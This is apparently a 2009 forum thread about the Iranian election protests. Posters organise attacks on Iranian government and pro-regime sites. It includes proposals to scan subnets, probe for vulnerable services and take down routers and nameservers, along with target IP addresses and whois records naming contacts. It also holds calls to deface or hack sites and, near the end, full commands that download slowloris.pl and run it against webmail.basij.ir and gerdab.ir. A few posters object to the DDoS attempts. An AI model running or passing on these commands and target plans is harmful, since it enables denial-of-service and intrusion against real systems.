port 80 and 443 are the webserver. port 21 seems to be filtered. no obvious holes. that webserver can easily be taken down by using slowloris.pl though.
lets get serious Why hack webservers? Common people lets scan their subnet range and find more exotic servers housing more exotic features of the governement... I'm willing to bet they're on the same subnet... Someone with bandwidth pingsweep and find what host are alive and look for vuln services... Ahmadinejad.ir - 217.218.155.110 leader.ir 62.220.121.130 lets find core backbone routers... traceroutes, drop nameservers... if the governement doesn't want communication for the people then they shouldn't get communication either...
Here is what I got when I ran a whois quary, with the ip-217.218.155.110 10:17:09 PM, 06/20/2009, (GMT - 6:00) WhoIs results: Domain: 217.218.155.110 WhoIs server: whois.arin.net (192.149.252.44) OrgName: RIPE Network Coordination Centre OrgID: RIPE Address: P.O. Box 10096 City: Amsterdam StateProv: PostalCode: 1001EB Country: NL ReferralServer: whois://whois.ripe.net:43 NetRange: 217.0.0.0 - 217.255.255.255 CIDR: 217.0.0.0/8 NetName: 217-RIPE NetHandle: NET-217-0-0-0-1 Parent: NetType: Allocated to RIPE NCC NameServer: NS-PRI.RIPE.NET NameServer: NS3.NIC.FR NameServer: SUNIC.SUNET.SE NameServer: SNS-PB.ISC.ORG NameServer: SEC1.APNIC.NET NameServer: SEC3.APNIC.NET NameServer: TINNIE.ARIN.NET Comment: These addresses have been further assigned to users in Comment: the RIPE NCC region. Contact information can be found in Comment: the RIPE database at Query the RIPE Database RegDate: 2000-06-05 Updated: 2009-03-25 # ARIN WHOIS database, last updated 2009-06-20 19:21 # Enter ? for additional hints on searching ARIN's WHOIS database.
Then after quaring at that site i got this, not sure if it helps any. Query the RIPE Database Search for Switch to the RIPE TEST Database % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: This output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '217.218.0.0 - 217.218.191.0' inetnum: 217.218.0.0 - 217.218.191.0 netname: Area-6 descr: Area no 6 partition country: IR admin-c: HA1537-RIPE tech-c: ZD144-RIPE status: LIR-PARTITIONED PA "status:" definitions mnt-by: AS12880-MNT mnt-lower: AS12880-MNT source: RIPE # Filtered person: Hamid Alipour address: Information Technology Company (ITC) address: P.O.Box 16315-737. address: Tehran address: Iran phone: +98 21 84803400 fax-no: +98 21 84803453 e-mail: abuse@mail.dci.co.ir e-mail: soc@dci.ir nic-hdl: HA1537-RIPE mnt-by: AS12880-mnt source: RIPE # Filtered person: Zahra Deliri address: Datacommunications Company of Iran address: DCI address: No 2.1 Yazdanpanah st.Vali Asr Av. address: Tehran address: Iran phone: +98 21 8790652 fax-no: +98 21 8790030 nic-hdl: ZD144-RIPE remarks: Technical Contact Person remarks: Please for any abuse report write to abuse@mail.dci.co.ir mnt-by: AS12880-mnt source: RIPE # Filtered % Information related to '217.218.0.0/15AS12880' route: 217.218.0.0/15 descr: DCI-Route origin: AS12880 mnt-by: AS12880-MNT source: RIPE # Filtered % Information related to '217.218.128.0/18AS12880' route: 217.218.128.0/18 descr: DCI-Route origin: AS12880 mnt-by: AS12880-MNT source: RIPE # Filtered % Information related to '217.218.128.0/17AS12880' route: 217.218.128.0/17 descr: DCI-Route origin: AS12880 mnt-by: AS12880-MNT source: RIPE # Filtered % Information related to '217.218.0.0/16AS12880' route: 217.218.0.0/16 descr: DCI-Route origin: AS12880 mnt-by: AS12880-MNT source: RIPE # Filtered % Information related to '217.218.128.0/19As12880' route: 217.218.128.0/19 descr: DCI-Route origin: As12880 mnt-by: AS12880-MNT source: RIPE # Filtered
Twitter Account Hacked? This may sound paranoid but.........once I started sending Tweets that said things like, Basiji, you are cowards. You shoot unarmed and women. Lay down your arms. Murder or Freedom. Your choice. I sent Tweets like that for about 4 hours and I never once saw it come up at #iranelection. Before I started saying things like that, I would see my Tweets once in a while. Is it possible Iran gov't. disabled my Twitter account? Or did I just miss it? Thanks.
Stop the ddos attacks You MAY want to pay attention to this post... I can fully see the logic in his/her post and would recommend the same!
_----_ dont forget Press TV a fu**ing piece of sh*t News agency n farsnews.com a main website for spreading bullshit
It's good to know what bullshit they are spreading, because it gives you a clue at what they are worried about the most.
To see your tweet you need to include the tag of course. Ex: "Die you scum sucking Basiji#iranelection"
Change content of Supreme Leader's website. Can the content of the Supreme leader's website be modified to include photos of the dead, and videos of the dying next to the photos of the supreme leader.
Redon ballet Maybe you should have paid attention instead. They're already saying that it's all the westerners fault. DDOS or not. No one gives a shit what they say. They want censorship - they get closed pools.
I always put several tags, #iranelection #Tehran #Iran #Mousavi #gr88 I was seeing my tweets every once in a while before I started posting about Basiji. I posted about them for about 4 hours and realized I was not seeing those Tweets. So I wondered if my account was hacked.
Chinese internet shut down by simple DDoS attack Chinese internet shut down by simple DDoS attack Well, a large portion of it anyway. A DDoS attack on one domain server created a cascade reaction that left five provinces struggling to get online: This is what happened during the DNSPod incident, however, it triggered a chain of unexpected events, which led to network congestions for the carrier networks. DNSPods servers happen to be used by Baofeng, a highly popular Chinese video streaming service. Once the millions Baofeng users fired up their desktop application, all the requests bounced off on the ISP servers, which did not know how to process them. The intense traffic on the high-level servers caused bottlenecks, slowing everyones Internet connection down to a crawl. In addition to the users in the five aforementioned provinces, who were severely affected, customers in Henan, Anhui and Gansu have also reportedly experienced problems. SOURCE: http://www.thedarkvisitor.com/ Site seems to be down??? g
The protesters should try to take control of "Voice Of Justice", assuming the station is in Iran, I've heard it on 9495 AM in North America.
^^^THIS! They have a communications infrastructure whch is vital to their operations. If anything were to be accomplished by hacking, it would be an attack against them. Trying to DDOS a pro-regime web site will accomplish nothing.
bwahahaha - funny google bso.ir. their site comes up as "HACKED BY KAMY4r." That may have happened a long time ago - dunno cause the site is inacessible now.
This seems to be a fake site about Moussavi : ????? ??????? ????? www.MirHoseyn.ir http://iran.whyweprotest.net/farsi-english/1689-fake-site.html#post13721 I count on you, HACK IT !
three simple commands... wget http://ha.ckers.org/slowloris/slowloris.pl chmod +x slowloris.pl ./slowloris.pl -dns webmail.basij.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
posted too soon Scratch that, gerdab.ir is back up - that's the site where the Basij posted up photos of protesters in order to ID and arrest them. Please help bring it back down, we had it down most of the day, the command you should run is: ./slowloris.pl -dns gerdab.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
